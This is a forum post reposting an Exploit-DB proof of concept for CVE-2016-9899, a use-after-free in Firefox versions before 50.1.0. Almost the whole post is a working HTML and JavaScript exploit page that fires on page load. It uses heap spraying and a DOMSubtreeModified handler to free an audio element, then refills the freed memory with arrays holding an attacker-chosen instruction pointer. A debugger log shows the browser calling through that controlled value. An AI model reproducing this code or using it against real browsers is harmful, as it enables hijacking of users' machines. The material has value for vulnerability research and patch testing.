Jump to content
Nytro

Mozilla Firefox < 50.1.0 - Use After Free

Recommended Posts

<!DOCTYPE html>
<html>
  <head>
  <!-- <meta http-equiv="refresh" content="1"/> -->
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta http-equiv="Expires" content="0" />
  <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
  <meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
  <meta http-equiv="Pragma" content="no-cache" />
  <style type="text/css">
   body{
        background-color:lime;
        font-color:red;
   };
  </style>
  <script type='text/javascript'></script> 
  <script type="text/javascript" language="JavaScript">
    
   /* 
    * Mozilla Firefox < 50.1.0 Use-After-Free POC
    * Author: Marcin Ressel
    * Date: 13.01.2017
    * Vendor Homepage: www.mozilla.org
    * Software Link: https://ftp.mozilla.org/pub/firefox/releases/50.0.2/
    * Version: < 50.1.0
    * Tested on: Windows 7 (x64) Firefox 32 && 64 bit
    * CVE: CVE-2016-9899
    *************************************************
    * (b1c.5e0): Access violation - code c0000005 (first chance)
    * First chance exceptions are reported before any exception handling.
    * This exception may be expected and handled.
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\xul.dll - 
    * eax=0f804c00 ebx=00000000 ecx=003be0c8 edx=4543484f esi=003be0e4 edi=06c71580
    * eip=6d7cc44c esp=003be0b8 ebp=003be0cc iopl=0         nv up ei pl nz na pe nc
    * cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
    * xul!mozilla::net::LoadInfo::AddRef+0x3dd41:
    * 6d7cc44c ff12            call    dword ptr [edx]      ds:002b:4543484f=????????
    * 0:000> dd eax
    * 0f804c00  4543484f 91919191 91919191 91919191
    * 0f804c10  91919191 91919191 91919191 91919191
    * 0f804c20  91919191 91919191 91919191 91919191
    * 0f804c30  91919191 91919191 91919191 91919191
    * 0f804c40  91919191 91919191 91919191 91919191
    * 0f804c50  91919191 91919191 91919191 91919191
    * 0f804c60  91919191 91919191 91919191 91919191
    * 0f804c70  91919191 91919191 91919191 91919191
    *
    */ 
   var doc = null;
   var cnt = 0;
 
   function m(blocks,size) {
            var arr = [];
            for(var i=0;i<blocks;i++) {
                arr[i] = new Array(size);
                for(var j=0;j<size;j+=2) {
                    arr[i][j] = 0x41414141;
                    arr[i][j+1] = 0x42424242;
                }
            }
            return arr;
    } 
       
    function handler() {    //free
             if(cnt > 0) return;
             doc.body.appendChild(document.createElement("audio")).remove();      
             m(1024,1024);   
             ++cnt;
    }
 
    function trigger() {
             if(cnt  > 0) {
                var pl = new Array();
                doc.getElementsByTagName("*")[0].removeEventListener("DOMSubtreeModified",handler,false); 
                for(var i=0;i<4096;i++) {           //replace
                    pl[i]=new Uint8Array(1000);
                    pl[i][0] = 0x4F;
                    pl[i][1] = 0x48;
                    pl[i][2] = 0x43;
                    pl[i][3] = 0x45; //eip  
                    for(var j=4;j<(1000) - 4;j++) pl[i][j] = 0x91; 
                   // pl[i] = document.createElement('media');
                    //document.body.appendChild(pl[i]);
                }
                window.pl = pl
                document.getElementById("t1").remove(); //re-use
             }
    }
 
    function testcase()
    {
             var df = m(4096,1000);
             document.body.setAttribute('df',df);
         doc = document.getElementById("t1").contentWindow.document;
         doc.getElementsByTagName("*")[0].addEventListener("DOMSubtreeModified",handler,false); 
         doc.getElementsByTagName("*")[0].style = "ANNNY";
         setInterval("trigger();",1000);   
 
    }
  </script>
  <title>Firefox < 50.1.0 Use After Free (CVE-2016-9899) </title>
  </head>
  <body onload='testcase();'>
   <iframe src='about:blank' id='t1' width="100%"></iframe>
  </body>
</html>

Sursa: https://www.exploit-db.com/exploits/41042/

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...